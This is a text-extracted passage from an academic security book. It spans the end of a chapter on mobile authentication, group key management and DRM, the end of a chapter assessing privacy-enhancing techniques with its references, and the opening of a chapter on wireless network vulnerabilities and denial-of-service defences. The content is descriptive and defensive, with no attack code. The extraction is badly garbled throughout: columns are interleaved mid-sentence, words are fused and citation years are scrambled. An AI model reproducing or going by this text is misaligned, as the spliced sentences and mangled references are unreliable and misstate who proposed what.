but also hardware-assisted ones have lately been an AAA infrastructure and have an encryption
introduced. of user credentials as compulsory policy. A cer-
All these authentication methods, secure stor- tificate-based medium access control and AAA
age and rights management support secure data system is advised, where AAA messages can
exchange, but they do not protect the privacy of carry also the certificates needed to secure t
usercredentials,preferences,andprofiles. messageAd hoc
exchange.
networks, like personal area networks (PANs), As public key operations induce a lot of network
whichmovearoundandaredynamicallyconfigured traffic,thenegotiatedsessionkeyshavetobeuse
open for intrusion attacks on the privacy. in the most efficient way. Encryption protocols
Thus, protection of user credentials in wireless designed for wired environments, like transport
environments is one of the focal points of current layer security (TLS) do not consider problems
research.Beforeaddressingprivacy,we willfirst
associated with the broadcast transmissions and
summarise issues in key management protocols. limitations of mobile devices. In a wired, or at

Figure 4. TLS key negotiation data transferred over the radio interface beside the
high computing power needs.
In environments with limited resources, au-
thentication and identity management based on
preshared keys is still the most effective solution.
Badra and Hajjeh (2006) propose an extension to
TLS, which enables the use of preshared secrets
instead the use of asymmetric encryption. This is
in line with the efforts to keep resource needs at
the required minimum level in mobile devices. A
preshared key solution was also proposed by the
3rd Generation Partnership Projects (3GPP, 2004)
and (3GPP2, 2007) as an authentication method
for wireless LAN interworking. The problem with
the proposed solution is preshared keys does not
provide adequate secrecy nor identity protection in
Internet connections. To deal with this problem, the
Figure5.TLS-KEMkeynegotiation TLS-key exchange method (TLS-KEM) provides
identity protection, minimal resource need, and
full compatibility with the original protocol suite
as seen in Figure 6.
In direct comparison, the public key based
TLSneedsalotmorecomputing,datatraffic,and
deployment effort.
In UMTS networks, an array of authentication
keys is sent to the mobile in authentication vec-
tors. In the computer world a good solution would
be using hash functions to calculate new session
keys, as these consume low power and require
little computing.
A moving terminal can experience a commu-
nication problem, as the overhead caused by key
negotiation might extend the connection time to a
network node. A preserved session key for use in
the new network is a potential solution in a mobile
leastfixedenvironment,computational costofkey
environment, as it speeds up the node’s authentica-
negotiations is usually neglected. For example TLS tion. Lee and Chung (2006) recommend a scheme,
is using several public key operations to negotiate which enables to reuse of session keys. Based on
a session key. This can be a problem for mobile the AAA infrastructure, it is possible to forward
devices, since computational cost is much higher the key to the new corresponding AAA server on
in asymmetric encryption. The standard TLS suite a protected network and use it for authentication
uses lots of cryptographic operations and gener- without compromising system security. This can
ates a too large message load on wireless links reduce the delay for connecting, and also reduces
(see Figure 5). the possibility of authentication failure. Since the
If a mobile device wants to execute mutual old session key can be used for authenticating the
authentication with a service provider, with cer- node towards the new AAA server, connection
tificate exchanges, it can lead to big amounts to the homeofAAA is not needed any more. The

messages are exchanged as follows (Lee & Chung, mances for public key based mechanisms (Lim,
2006): when sending the authorisation request to Lim, & Chung, 2006). Mobile IPv4 uses symmet-
the new network, the node also includes the old ric keys and hashes by default. Since symmetric
network address it had. The foreign agent connects keys are hard to manage, a certificate-based key
to the new local AAA server and sends an authen- exchange was recommended, but this demands
tication request. The new AAA server connects more resources. To lower the resource demand, a
to the old one sending a message to identify the composite architecture was recommended (Sufa-
user. The old AAA authenticates the message by trio,.) 9The
1 procedure uses certificates only
checking the hash value included, and generates a in places where the terminal does not require
nonce for the terminal and the foreign agent. The processing of the public key algorithm and does
server composes an AAA-terminal answer, which notrequirestorageofthecertificate.
is composed from a plain nonce, an encrypted nonce The result of the comparison shows that hash
using the key shared between the old foreign agent isbyfarthemostefficientmethodintermsofkey
and the terminal. Then the whole message is signed generation,butsuffersfrommanagement - difficul
and encrypted with the key used between the two ties. Lim et al. (2006) also demonstrates that a pure
AAA servers. When the new AAA receives it, certificate-based authentication is unsuitab
decrypts and sends the message to the new foreign mobileenvironments.Partialuseofcertificatesa
agent. Based on the plain nonce, the agent generates identity-based authentication with extensive use of
the key and sends down the reply, which includes hash functions can be a potential way ahead.
also the nonce encrypted by the old AAA. After
the authentication of the user towards the network,
the user can start using services. AutHEntIcAtIon of dEvIcE
Key distribution and efficiency- in grouPs e- com
merce applications is another important aspect.
The network’s AAA usually does not exchange In a ubiquitous environment, moving networks
information with third parties or can not use the appear. PANs and ad hoc connections based on
authentication data of the network access because various preferences emerge and fall apart. These
of privacy issues. Current security demands require devices communicate with each other and have
mutualidentificationofcommunicating parties
usually in
very limited capabilities in terms of
an e-commerce application. This can easily lead computing power and energy reserves. In order
to compromising the customer to companies (for to provide secure communication between any
example in a GSM network, the user has to trust part of the network, hierarchical key management
the network unconditionally). If the user can also methods emerged (Kim, Ahn, & Oh, 2006). Here
check the identity of the service provider, at least a single trusted server is used to manage the group
man-in-the-middle attacks are locked out. key. These entities are usually storing the keys in
When a user starts a new session with a service a binary tree, where nodes are the leaves.
provider, this session should be based on a new Public key operations are usually required
key set. The session key has to be independent when a terminal wants to connect to a group for
from the previous one in means of traceability thefirsttime.Agroupmanagementsystemneeds
and user identity should not be deductible from frequent key generation rounds, because it has to
the session key, thus ensuring user privacy. For ensure forward and backward secrecy. Strict key
mutual identification, a key exchange method management ispolicies ensure that no new node is
proposed by Kwak, Oh, and Won (2006), which capableofdecodingformertrafficandnoneofthe
uses hash values to reduce resource need. The key old nodes have the possibility to decrypt current
calculation is based on random values generated traffic.Toadjustresourceusageto-mobileenviron
by the parties, which ensures key freshness. ment, a management scheme which uses mainly
The use of hash functions is recommended in simple operations like XOR and hash is advisable
mobile environments, providing better perfor- (Kim et al., 2006). As the key in the root of the
0
Figure6.Keysinabinarytree 2005). Network-capable multimedia devices, media

players, game consoles, and digital set-top boxes
are widespread and part of the digital entertain-
ment era. Content is stored within this network,
and provided through the Internet to other users.
Since the birth of peer-to-peer (P2P) networks,
such technologies are in the crosshair of content
providers. Recently, some software developers and
a few musicians started using the torrent network
for cost effective delivery of their content. A digi-
tal rights management method designed for such
binary tree is used to authenticate the whole group,
network is still missing.
keys need to be regenerated when a node leaves
Current right protection solutions are not com-
the network. This procedure is starting from the
patible with each other and the user friendliness is
parent of the former node and goes up to the root.
also varying. The basic problem is, that just a very
Then the management unit sends out the new keys
few devices are equipped with tamper resistant
in one message. Building a tree from keys ensures
storage and integrated cryptographic capabilities.
fast searches and a simple, clean structure. In addi-
Beside software solutions, which are meant as
tion, all keys in the internal nodes are group keys
weak solutions, hardware-based encryption can
for the leaves under them. So a subset of devices
severely limit the lawful use of digital content.
can be easily addressed.
Recent lawsuits related to Sony’s rootkit protec-
The root unit has to compute these keys in
tion mechanism also reveals that customer rights
acceptable time, requiring a more complex ar-
of usage is considered to be more important than
chitecture. In PANs this is usually not a problem,
the legitimate wish of content providers to protect
but when a member of a larger subnet is leaving,
the content.
calculations could be more demanding. A standard
Trusted platform modules (TPM) are the most
group key handling method is the Tree-based Group
likely candidate for content protection in hard-
Diffie-Hellman(TGDH)where, managementsteps
ware-based solutions. While providing encryption
assume that all nodes have the same processing
capabilities, it is very likely that these components
capabilities. To ensure maximal efficiency, the
will be used to dispose the users’ right to decide
highest performance unit shall be the one in the
over the user’s own resources.
root of the tree (Hong & Lopez-Benitez, 2006).
The current discussions on DRM for audio
When node computing capabilities are showing big
content are regarded as minor when compared to
differences, the overhead caused by tree transfor-
highdefinition(HD)contentprotection.Eventhe
mations does not represent a drawback.
connection to the screen has to use strong encryp-
Another significant group of devices that
tion, which has to exceed GSM/UMTS encryption
need encryption can be found in home networks,
in order to be acceptable for content providers.
where the focus is on management of content and
Enforcing a digital, end-to-end encrypted stream
personal data.
means that a HD-TV purchased at the end of 2006
may not work with the new encryption standards
for HD. There is no current solution for comput-
sEcurE HoME nEtwork And ers to legally play full resolution HD. By the end
rIgHts MAnAgEMEnt of 2006 it was announced, that a workaround is
arising to deal with the advanced content protec-
Deployment of wired or wireless home networks tion system of HD.
happens in roughly 80% of all households with A more discrete, but not intrusive business
broadband access (Noll, Ribeiro, & Thorsteinsson, model discussion for digital content management

is presented in order to visualise the requirements KálmánandNollrecommend

0 2 6) ( aphone-
of this market. Apple’s FairPlay enables making based solution. This represents a good trade-off
backup copies of audio tracks, which is permitted between user experience and content protection.
by law in several European countries, and copy The phone is practically always online, most of
of content between the user’s iPod players. This them have Bluetooth or other short range radio
solution is considered being to open for some transmitters, so licenses can be transmitted on
content providers, and the distribution is limited demand. Since the phone has a screen and a
to a server-client infrastructure. For HD content keyboard, it is possible to request authorisation
with high bandwidth needs such a server-client from the user before every significant message
infrastructure is not advisable, both from a server exchange, so the user can control the way licenses
and network point of view. The ever growing size are distributes.
of P2P networks form a perfect infrastructure to If we look aside the issues related to busi-
deliver content with high bandwidth need practi- ness aspects, computational issues still remain.
cally without substantial transmission costs. P2P Highly secure DRM entities will use asymmetric
networks are usually run without any DRM support. encryptionandcertificates.SurandRhee026)(
An additional infrastructure supporting DRM in a recommend a device authentication architecture,
P2P network used to transmit content will enable which eliminates traditional public key operations
high volume distribution of digital content (Pfeifer, except the ones on the coordinator device. This is
Savage, Brazil, & Downes, 2006). If seamless achieved by using hash chains including the permis-
license delivery and user privacy could be guar- sion, for example, a device can get keys to play a
anteed, such a network could be the foundation of designated audio track ten times or permission to
a low cost content delivery scheme. usefivedailypermitsondemand.Suchschemes
While the usage of P2P networks is an excel- allow end devices to be simpler and lower network
lent idea, the recommended solution proposed by communication overhead.
Nützel and Beyer (2006) is similar to the Sony’s If a central device is not appreciated, a com-
rootkit solution: It bypasses the user control and posite key management scheme may be used. The
is thus not acceptable. While the primary goal is parties in the PAN will form a web of trust like in
to secure content, the software used in such solu- aconfidentialityscheme,forexample,prettygood
tions acts like hidden Trojans and opens backdoors privacy (PGP). In this web, the main key is split
not only for the content providers, but also other between nodes and cooperation is needed for sig-
hackers. nificantoperations.Thismeansthatifthescheme
Content usage across platforms is not supported is operating on a (k, n) basis, k-1 nodes can be lost
yet, as a common standard does not exist. Pfeifer before the system needs to be generate a new key.
et al. (2006) suggests a common management Fu, He, and Li (2006) mention the problem of the
platform for DRM keys with an XML-based, PAN’s ad hoc nature as the biggest problem. Since
standard MPEG-REL framework. Users will also this scheme selects n nodes randomly, the ones
produce content with digital protection, in order to that are moving between networks fast can cause
ensure that personal pictures cannot be distributed instability in the system. Also, the resource need of
electronically. Social networks and groups of inter- this proposal is quite high on all nodes present.
est, as well as distribution of content in PANs is a When a scheme is enabling off-line use of
challenge for DRM development. Zou, Thukral, license keys, attention should be given to prob-
and Ramamurthy (2006) and Popescu, Crispo, lems arising from leaving or compromised nodes.
Tanenbaum, and Kamperman (2004) propose a Identity-based schemes become popular recently
key delivery architecture for device groups, which because of their efficiency in key distribution.
could be extended by a local license manager. The main drawback is that these proposals do not
The central key management unit could distribute provide a solution for revocation and key renewal.
licenses seamlessly to the device, which wants to Hoeper and Gong (2006) propose a solution based
get access, without invading user experience. on a heuristic (z, m) method. The solution is similar

Privacy-Enhancing Technique
lature and self-regulatory programs in helping to (4) rule holder. For appropriate interaction between
enforce Web site policies. thosethreeinterfacesaredefined, - includingapub
APPEL (World Wide Web Consortium [W3C], licationinterfaceandanotificationinterface
2002) can be used to express what a user expects GEOPRIVspecifiesthata“usingprotocol”is
tofindinaprivacypolicy.P3PandAPPELmerelyemployed to transport location objects from one
provide a mechanism to describe the intentions of place to another. Location recipients may request
both sides than means to protect user data after a location server to retrieve GEOPRIV location
agreeing to use the service. information concerning a particular target. The
There are several privacy-related tools that are location generator publishes location information
basedonP3PandAPPELspecifications.AT&T’s to a location server. Such information can then be
(n.d.) Privacy Bird is a free plug-in for Microsoft® distributed to location recipients in coordination
Internet Explorer. It allows users to specify privacy with policies set by the rule maker, for example,
preferences regarding how a Web site stores and the user whose position is stored.
collects data about them. If the user visits a Web A using protocol must provide some mecha-
site, the Privacy Bird analyzes the policy provided nism allowing location recipients to subscribe
and indicates whether or not the policy fits to inordertoreceiveregularnotific
persistently
the users preferences. The Microsoft® Internet of the geographical location of the target as its
Explorer 6 (Microsoft, n.d.) and Netscape® 7 location changes over time. Location generators
(Netscape, n.d.) embed a similar behaviour. They must be enabled to publish location information
allow the user to set some options regarding cookies to a location server that applies further policies
and are capable of displaying the privacy policy for distribution.
in human readable format. All these tools are a Oneofthebenefitsofthisarchitectureistha
valuable step into the right direction, but they the privacy rules are stored as part of the location
still lack means to personalize privacy policies. object (Cuellar et al., 2004). Thus, nobody can
Steps towards personalized privacy policies are claim that he/she did not know that access to the
discussed by Maaser and Langendoerfer (2005) location information was restricted. But misuse is
andPreibuschIn .)052 ( Preibuschafine-grained still possible and it is still not hindered by techni-
choice from a set of offered policies is proposed cal means.
whereas a form of a bargaining in which neither
party fully publishes all its options is proposed in Server Side Means
Maaser and Langendoefer.
Privacy policies allow for “opting-out” of or In order to ensure privacy after agreeing to a
“opting-in” to certain data or data uses. But they certain privacy policy or privacy contract suitable
do not provide a technical protection means. The means on the data gathering side are needed. Such
user has no control on the actual abidance of the could be hippocratic databases (Agrawal, Kiernan,
policy but still has to trust that his/her personal Srikant, & Xu, 2002), HP Select Access (Casassa,
data is processed in accordance to the stated P3P Thyne, Chan, & Bramhall, 2005), Carnival (Arne-
policy only. Enforcement of the policy abidance sen, Danielsson, & Nordlund, 2004), PrivGuard
could be done by hippocratic databases or other (Lategan & Olivier, 2002). All these systems check
means. whether an agreed individual privacy policy allows
access to certain data for the stated purpose and
2. IETFs GeoPriv by the requiring entity.
There are several approaches that try to protect
GEOPRIV is a framework (Cuellar, Morris, Mul- privacy in location-aware middleware platforms
ligan, Peterson, & Polk, )024 that defines four (Bennicke & Langendörfer, 2003; Gruteser &
primary network entities: (1) a location generator, Grunwald, 2003; Langendörfer & Kraemer, 2002;
(2) a location server, (3) a location recipient, and a Synnes, Nord, & Parnes, 2003; Wagealla, Terzis,

& English, 2003). In Langendörfer and Kraemer; linking individual transactions by using un-altered
Bennicke and Langendörfer; and Wagealla et al. pseudonyms. Along these lines, the use of identity
means are discussed that enable the user to declare management systems becomes essential in order
how much information he/she is willing to reveal. to ensure that all pseudonyms are used correctly,
In Synnes et al. the authors discuss a middleware when interacting with service providers. In addi-
thatusesuser-definedrules,whichdescribe tion, support who
for the generation of pseudonyms can
may access the user’s position information and be of help in order to guarantee a minimal level of
under which circumstances. The approach inves- pseudonym quality.
tigated in Gruteser and Grunwald intentionally In Table 2 we have not included descriptive
reduces the accuracy of the position information in and server-side approaches. With the former data
order to protect privacy. All these approaches lack gathered depends on user preferences and the latter
means to enforce access to user data according to provides protection against misuse only after the
theaccesspolicydefinedbyusers.Acombination fact,thatis,ithasnoinfluenceonthe - dataaccu
of the location-aware middleware platforms with mulated in a certain service provider’s database.
protection means sketched previously would clearly
improveuserprivacy.Afirststepinthis direction
Protection level
was reported in Langendörfer, Piotrowski, and
Maaser (2006) where users are enabled to generate In order to asses the protection a certain PET can
Kerberos tokens on their own device and where provide we use a classification with - four protec
the platform checks these tokens before granting tion levels:
access to user data.
• High: Technical means are given to ensure
that the amount of data that can be gathered
AssEssMEnt of PrIvAcy- by a service provider is restricted to a mini-
EnHAncIng tEcHnIquEs mum or matches the user’s requirements. So,
no detailed information can be deduced from
In this section we discuss the protection level that gathered data. The downside is that no value-
can be achieved by applying privacy-enhancing added services can be provided or a service
techniques. In order to clarify how different classes may not be provided at all.
of approaches effect user privacy we resume our • Medium: The data that are gathered can not
example from the Privacy Protection Goals sec- only be determined by the user, but he/she
tion and show which data is protected by which keeps somewhat control over them. This
means. Thereafter we identify the protection level control might be either an active data con-
achieved by each class of protection means. trol, that is, an obeyed request for deletion,
orpassivecontrolthatspecifiescertainru
Evaluation of Presented techniques on how these data shall be dealt with in the
future or for certain purposes.
For the evaluation of the privacy-enhancing tech- • Low: The user can determine which of
niques we resume our example. Table 2 shows that his/her data is gathered. Especially if there
each class of privacy-enhancing techniques has its is no proven technical means to protect the
ownmeritandisapplicableforaspecifictype data,ofit is the task of the service provider
information. The fact that all techniques have been to ensure the security of the gathered data.
designed to protect specific information Theallows
drawbacks for service providers could
easy combination of several approaches to improve be that users are hesitant to use their service
user privacy. In the case of e-cash with revocable if they cannot prove the security/privacy of
anonymity the use of different pseudonyms is es- the data.
sential in order to prevent service providers from

Table 2. The sets of user data each party can link per transaction. The positing system can get informa-
tion only if the user role is passive, that is, the system tracks the user.
Party unprotected pseudonyms anonymous e-cash

1. Identity 1. Identity
1.1 Location system user 1.1 Location system user
1. Identity
pseudonym pseudonym
2. Location
1.2 Service user pseudonym 1.2 Service user pseudonym
User 3. Service provider
1.3 E-cash user pseudonym 2. Location
4. Purchase details
2. Location 3. Service provider
3. Service provider 4. Purchase details
4. Purchase details
Positioning
(1); (2) (1.1); (2) (1.1), (2)
system
Location
handling 1; 2; 3 1.1; 2; 3 1.1; 2; 3
subsystem
Service provider 1; 2; 3; 4 1.1; 1.2; 1.3; 2; 3; 4 1.1; 1.2; 2; 3; 4
Payment provider 1; 3 3 3
Network
1; 2; 3; 4 1.1; 1.2; 1.3; 2; 3; 4 1.1; 1.2; 2; 3; 4
unencrypted
Network
3 3 3
encrypted
Network with
- - -
MIX
• None: The user, respectively, the owner of the ample, anonymous e-cash schemes provide a high
data,hasnoinfluenceonthekindofdata that
level of protection since they prevent the user’s
is gathered, which information gets inferred bank from learning about the users online purchase
or derived. In addition, the service provider habits as well as the service provider from reveal-
or data collector respectively applies no ap- ing the users identity. But if the anonymous e-cash
propriate means to protect the information scheme is used by a single customer of the bank
or privacy. In this case we cannot speak of only, the protection provided by the anonymous
privacy at all. Such an environment enables e-cash scheme collapses to the protection against
service providers or others to gather as much the service provider, since the bank can easily link
and almost any data they want. Besides the the e-coins to the user’s identity.
drawback for service users having no privacy Table 3 shows the protection level of all pre-
at all is it most likely diminishes the trust of sented classes of privacy-enhancing techniques
the users or potential customers respectively such as mix networks and so forth. Here we did
into such services. not consider individual differences in a class since
weighting individual the drawbacks of similar ap-
In the classification of the PET according proachestodepends much on personal preferences
protection levels we are focussing on the strength and technical differences are already discussed in
of the classes of mechanism and neglect the side the Discussion of Privacy-Enhancing Techniques
effects. We are aware of the fact that real system section.
properties such as the number of participants have
significantimpactontheprotection - level.Forex

Table 3. Protection level of the individual privacy-enhancing techniques at network and application
level
Descriptive
Anonymous DA + server side Location
Mix networks Pseudonyms approaches
e-cash technologies protection
(DA)
Application low -
none medium High low medium
level medium
Network level high none None none none none
conclusIon (2000) and Novak, Raghavan, and Tomkins (2004)

the individual way of writing was described as a
In this chapter we have presented privacy-enhanc- means to link pseudonyms together. As long as
ing techniques that have evolved during the last service users are only entering a pseudonym and
decades. If all these techniques are combined and an e-mail address into Web forms they are still
used in the correct way, user privacy is reasonably safe, but writing exhaustive comments in news
protected. The sad point here is that despite the groups or blogs provides sufficient material to
fact that some of these approaches are quite well link pseudonyms.
understood, they are still not in place. So despite Pervasive computing is going to become a real
that privacy protection is theoretically possible inchallenge for privacy-enhancing techniques. A lot
the real world it is hard to achieve. Only differentof information can be gathered by the environment
versions of Chaum’s (1981) mix network approach and up to now it is still an open issue how such an
and P3P (Cranor et al., 2002)/APPEL (W3C, 2002) environment can be adjusted to individual privacy
are currently in place to protect user privacy, and preferences.
experienced Internet users are using different
pseudonyms while browsing the Web or doing
e- or m-commerce. AddItIonAl rEAdIng
From our perspective, most of the privacy-en-
hancing techniques still suffer from acceptance Additional reading can be found on the Web pages
issues. Anonymous e-cash lacks support from of the EU-projects, Future of Identity in the In-
banks. Service providers might also be reluctant formation Society (FIDIS), Privacy and Identity
to accept fully anonymous e-cash due to the chal- Management for Europe (PRIME), and Safeguards
lenging fraud protection mechanisms involved. in a World of AMbient Intelligence (SWAMI). The
Even using mix networks is problematic nowadays. firsttwoprojectsarefocusingonidentity - manage
Many service providers block their access if they ment issues whereas SWAMI deals with privacy
recognize usage of mix networks. Officially it is
issues in pervasive environments. The research
mostly justified with crimeprevention, though
agenda it(http:www.
of FIDIS / fidis.net) includes
can be assumed that they do not want to lose valu- virtual identities, embodying concepts such as
able additional user information. pseudonymity and anonymity. PRIME (https://
The paradigm shift in Internet use from wired www.prime-project.eu) aims to develop a working
to wireless also leads to new challenges. Resource prototype of a privacy-enhancing identity manage-
consuming, privacy-enhancing techniques cannot ment system. In contrast to other research projects
be applied by mobile service users. This holds PRIME also aims at fostering market adoption of
especially true for use of mix networks. PETs. Privacy issues in pervasive environments
New technologies such as Web 2.0 allow com- have not been intensively investigated by the re-
pletely new kinds of attacks. In Rao and Rohatgi

searchcommunityinrecentyears.Afirst attempt
Brands, S. (1993). Untraceable off-line cash in wal-
is made by the SWAMI project (http://swami.jrc. lets with observers. In ProceedingsofCrypto’93
es), which focused on AMI projects, legal aspects, (LNCS 773, pp. 302-318). Springer-Verlag.
scenarios, and available PET.
Casassa Mont, M., Thyne, R., Chan, K., & Bram-
The workshop series “Privacy Enhancing
hall, P. (2005). Extending HP identity manage-
Technologies” published in Springer’s LNCS series
ment solutions to enforce privacy policies and ob-
(2482, 2760, 3856, 3424, 4258) provides a great
ligations for regulatory compliance by enterprises.
variety of publications dealing with technological,
HPL-.0 1 50-2 Retrieved January 1, 2007, from
social, and legal aspects of privacy.
http://www.hpl.hp.com/techreports/2005/HPL-
2005-110.html
rEfErEncEs Chaum, D. (1981). Untraceable electronic mail,
return addresses, and digital pseudonyms.
Agrawal, R., Kiernan, J., Srikant, R., & Xu, Y. Communications of the ACM, 24(2).
(2002, August 20-23). Hippocratic databases. In
Chaum,Security
D..)589 1 ( withoutidentification:
Proceedings of the 28th International Conference
Transaction systems to make big brother
onVeryLargeDataBases. Hong Kong, China.
obsolete. Communications of the ACM, 28(10),
Anton, A. I., He, Q., & Baumer, D. L. .)024( 1030-1044.
Inside JetBlue’s privacy policy violations. IEEE
Cranor, L. F. (2000). Beyond concern: Under-
Security & Privacy.
standing net users’ attitudes about online
Arnesen, R. R., Danielsson, J., & Nordlund, B. privacy. In I. Vogelsang & B. M. Compaine (Eds.),
(2004, November 4-5). Carnival: An application The Internet upheaval: Raising questions, seeking
framework for enforcement of privacy policies. answers in communications policy (pp. 47-70).
Paper presented at the 9th Nordic Workshop on Cambridge, MA: The MIT Press.
Secure IT-systems. Helsinki, Finland.
Cranor, L., Langheinrich, M., Marchiori, M., Pres-
AT&T Corporation. (n.d.). AT&T privacy bird. ler-Marshall, M., & Reagle, J. (2002, April 16).
Retrieved January 1, 2007, from http://privacy- The platform for privacy preferences 1.0 (P3P1.0)
bird.com Specification. Retrieved January 1, 2007, from
http://www.w3.org/TR/P3P/
Barbaro, M., & Zeller, Jr., T., (2006, August 9). A
face is exposed for AOL searcher no. 4417749. New Cuellar, J., Morris, J., Mulligan, D., Peterson, J.,
York Times. Retrieved from http://www.nytimes. & Polk, J. (2004). GEOPRIVrequirements
com/technology/
/ 9 0 8 / 62 aol.
90 html?ex=14 7 6 1 (RFC 3693). Retrieved from http://www.rfc-ar-
08&4en=f4
5 fbc4
80 1 84 e&
1 309 ei=570 0 chive.org/getrfc.php?rfc=3 3 96
Bennicke, M., & Langendörfer, P. (2003). Towards Federal Trade Commission (FTC). (1999). The
automatic negotiation of privacy contracts for FTC’sfirstfiveyears:Protectingconsumersonline.
Internet services. In Proceeding of the 11th IEEE Retrieved from http://www.ftc.org
Conference on Networks (ICON 2003). IEEE
Gruteser, M., & Grunwald, D. (2003, May 5-8).
Society Press.
Anonymous usage of location-based services
Berthold, O., & Köhntopp, M. (2000, July 25-26). through spatial and temporal cloaking. Paper
Identity management based on P3P. In Proceedings presented at the ACM/USENIX International
of the Workshop on Design Issues in Anonymity Conference on Mobile Systems, Applications, and
and Unobservability. Berkeley, CA. Services (MobiSys). San Francisco, CA.

Jendricke, U., & Gerd tom Markotten, D. (2000). Peterson, J. (2005). A presence architecture for
Usability meets security—The identity-manager the distribution of GEOPRIV location objects
as your personal security assistant for the Internet. (RFC 4079). Retrieved from http://www.ietf.
In Proceedings of the Computer Security Applica- org/rfc/rfc4079.txt
tions,ACSAC’0
02 , 6th
1 ,0 AnnualConference,
Preibusch, S. (2005, July 19-22). Implementing
New Orleans, LA (pp. 344-353).
privacy negotiation techniques in e-commerce. In
Jia, G., Brebner, G., & D’Uriage, M. (2004). Privacy Proceedings of the 7th IEEE International Confer-
protection system and method. U.S. Patent: enceonECommerceTechnology,IEEECEC,502
US 2004/0181683 A1. Technische Universität München, Germany.
Koch, M., & Wörndl, W. (2001). Community sup- Project: AN.ON—Anonymity.Online. (n.d.).
port and identity management. In Proceedings Protection of privacy on the Internet. Retrieved
of the European Conference on Computer Sup- January 1, 2007, from http://anon.inf.tu-dresden.
ported Cooperative Work (ECSCW 2001), Bonn, de/index_en.html
Germany.
Rao, J. R., & Rohatgi, P. (2000). Can pseudonymity
Langendörfer, P., & Kraemer, R. (2002). Towards really guarantee privacy? In of the
Proceedings
userdefinedprivacyinlocation-awareNinth platforms.
USENIX Security Symposium.
In Proceeding of the 3rd international Conference
Reed, M., Syverson, P., & Goldschlag, D. (1998).
on Internet computing. CSREA Press.
Anonymous connections and onion routing. IEEE
Langendörfer, P., Piotrowski, K., & Maaser, M. Journal on Selected Areas in Communications,
(2006). A distributed privacy enforcement archi- 6 1 (4).
tecture based on Kerberos. WSEAS Transactions
Reiter, M., & Rubin, A. (1998). Crowds: Anonym-
onCommunications, 5
(2), 231-238.
ity for Web transactions. ACM Transactions on
Lategan, F. A., & Olivier, M. S. (2002). PrivGuard: Information and System Security, 1(1), 66-92.
A model to protect private information based on
Sampigethaya, K., & Poovendran, R. (2006). A
its usage. South African Computer Journal, ,92
survey on mix networks and their secure applica-
58-68.
tions. ProceedingsoftheIEEE,(12). 49
Maaser, M., & Langendoerfer, P. (2005, July 26-28).
Synnes, K., Nord, J., & Parnes, P. (2003, January).
Automated negotiation of privacy contracts. Paper
Location privacy in the Alipes platform. In Pro-
presented at the Computer Software and Applica-
ceedings of the Hawaii International Conference
tions Conference, Edinburgh, Great Britain.
on System Sciences(HICSS-, )63 Big Island, HI.
Microsoft. (n.d.). Microsoft announces privacy
Tor: Overview. (n.d.). Retrieved January 1, 2007,
enhancements for Windows, Internet Explorer.
from http://tor.eff.org/overview.html
Retrieved January 1, 2007, from http://www.micro-
soft.com/presspass/press/2000/Jun00/P3Ppr.asp Treu,G.Kü& , pper,A.Efficient
. )05 2 ( proximity
detection for location based services. In Proceed-
Netscape. (n.d.). Netscape 7.0—7.2 release notes.
ings of the 2nd Workshop on Positioning, Naviga-
Retrieved January 1, 2007, from http://wp.netscape.
tionandCommunication502 (WPNC0, ) 5 Han-
com/eng/mozilla/ns7/relnotes/7.html#psm
nover, Germany: SHAKER-Publishing.
Novak, J., Raghavan, P., & Tomkins, A. (2004).
Wagealla, W., Terzis, S., & English, C. (2003).
AntiAliasing on the Web. In Proceedings of the
Trust-based model for privacy control in context-
13th international conference on World Wide Web,
aware systems. In Proceedings of the 2nd Workshop
New York.
on Security in Ubiquitous Computing, Ubicomp.

World Wide Web Consortium (W3C). (2002, April

15). W3C: A P3P preference exchange language
1.0 (APPEL1.0). Retrieved January 1, 2007, from
http://www.w3.org/TR/P3P-preferences/
kEy tErMs
Anonymous E-Cash: Electronic payment

system or protocol that provides anonymity to
its users.
APPEL: A language specification to define
rules for acceptance of certain P3P policies.
GeoPriv: An IETF working group, which
assesses the authorization, integrity and privacy
requirements of transfer, release or representa-
tion of geographic location information through
an agent.
Mix Networks: Ccombination of proxy
chains and asymmetric cryptography that enables
hard-to-trace communication over unprotected
networks.
P3P: The Platform for Privacy Preferences
Project (P3P) enables Websites to express their
privacy practices in a standard format that can be
retrieved automatically and interpreted easily by
user agents.
Privacy Enhancing Techniques: Technical
means that provide anonymity, intractability in
networks.
Pseudonyms: Bogus identity, possible tempo-
rary, used in order to hide the real identity.

Chapter X
Vulnerability Analysis and
Defenses in Wireless Networks
Lawan A. Mohammed
King Fahd University of Petroleum and Minerals, Saudi Arabia
Biju Issac
Swinburne University of Technology – Sarawak Campus, Malaysia
AbstrAct
This chapter shows that the security challenges posed by the 802.11 wireless networks are manifold
and it is therefore important to explore the various vulnerabilities that are present with such networks.
Along with other security vulnerabilities, defense against denial of service attacks is a critical compo-
nent of any security system. Unlike wired networks where denial of service attacks has been extensively
studied, there is a lack of research for preventing such attacks in wireless networks. In addition to
various vulnerabilities, some factors leading to different types of denial of service (DoS) attacks and
some defense mechanisms are discussed in this chapter. This can help to better understand the wireless
network vulnerabilities and subsequently more techniques and procedures to combat these attacks may
be developed by researchers.
IntroductIon could grow by a compound annual growth rate

(CAGR) of 200% from 2004 to 2009. In a similar
Due to the increasing advancement in wireless survey, the Infornetics projected that 57% of small,
technologies, wireless communication is becoming 62% of medium, and 72% of large organizations
more prevalent as it is gaining more popularity in in North America will be using wireless LANs
both public and private sectors. Wireless networks (WLANs) by 2009 (Richard, 2005).
are based on a technology that uses radio waves Wired networks requires a physical setup (i.e.,
or radio frequencies (RF) to transmit or send data cable wiring) for a user to get access and a misbe-
along a communication path. Companies and indi- haved network card can be tracked down and its
viduals are using wireless technology for important switch port can be disconnected remotely using
communications that they want to keep private. A network management tools. But wireless users are
recent report by a market research firm notCahners
connected to any physical socket, and being in
In-Stat (In-Stat, 2006) predicts sales of 802.15.4 an unknown location, network access can be ob-
devices (using low powered network standard) tained almost spontaneously. Generally speaking,
typical wireless networks are defenseless against points (APs) come from the manufacturers in open
individualswhocanfindunsecurednetworks. The
access mode with all security features turned off
wireless server dutifully grants the unauthorized by default. Therefore, insecure wireless devices
computer or mobile device an IP address, and the such as APs and user stations, can seriously com-
attacker is able to launch a variety of attacks such promise wireless networks, making them popular
asbreakingintospecificservers,eavesdropping on
targets for hackers.
network packets, unleashing a worm, and denial Securing wireless networks requires at least
of service (DoS) or distributed denial of service threeactionstobetaken:first,authenticatingu
(DDoS) attacks, and so forth. In this chapter, we to ensure only legitimate users have access to the
discuss some security threats along with DoS at- network; second, protecting the transmitted data by
tacks in a typical wireless networks and survey means of encryption; and third, preventing unau-
some counter measures. thorized connections by eliminating unauthorized
transmitter or receiver. This emphasizes the need
for a security framework with strong encryption
